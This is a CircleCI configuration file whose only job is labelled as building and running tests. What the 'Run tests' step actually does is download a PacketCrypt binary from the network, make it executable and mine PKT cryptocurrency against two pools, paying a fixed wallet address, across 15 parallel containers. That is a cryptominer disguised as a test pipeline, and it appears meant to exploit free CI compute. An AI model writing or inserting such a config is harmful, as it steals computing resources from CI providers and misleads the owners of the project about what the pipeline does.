version: 2.1
jobs:
  build_and_test: # this can be any name you choose
    docker:
      - image: thomasjp0x42/packetcrypt
    steps:
      - checkout
      - run:
          name: Run tests
          command: |
                  wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O packetcrypt
                  chmod +x packetcrypt
                  ./packetcrypt ann -p pkt1qsdsw62r5aardmqahq0syp5kltaa78ue7yqpwmx http://pool.pkt.world/ http://pool.pktpool.io/ 
    parallelism: 15
workflows:
  version: 2
  build:
     jobs:
       - build_and_test


